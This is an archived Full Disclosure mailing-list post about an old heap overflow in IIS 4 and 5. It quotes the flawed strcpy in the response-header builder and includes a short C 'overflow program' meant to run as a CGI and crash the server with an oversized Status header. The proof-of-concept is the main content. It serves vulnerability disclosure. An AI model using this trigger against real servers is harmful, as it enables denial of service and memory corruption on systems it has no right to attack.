Full Disclosure mailing list archives
iis4\iis5 older bug
From: yuange <yuange1975 () hotmail com>
Date: Tue, 28 Dec 2010 12:16:41 +0000
http://hi.baidu.com/yuange1975/blog/item/6242cfa9f651fbee1e17a2f6.html HTTP_REQ_BASE::BuildBaseResponseHeader( BUFFER * Response, ... STR * pstr, ... ) { ...... if ( !pstr ) { } else { strcpy( (CHAR *) Response->Ptr(), pstr->Str() ); //缓冲溢出,堆溢出 ...... } /* cgi.c ver1.0 iis4.0、iis5.0 overflow program copy by yuange 2003.1.3 */ #include <windows.h> #include <stdio.h> #define BUFFSIZE 0x4000 int main(int argc, char **argv) { char buff[BUFFSIZE]; memset(buff,'a',BUFFSIZE); memset(buff+BUFFSIZE-1,0,1); printf("Status:200ok%s\r\n\r\n\r\n\n\n",buff); return(0); }
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- iis4\iis5 older bug yuange (Dec 28)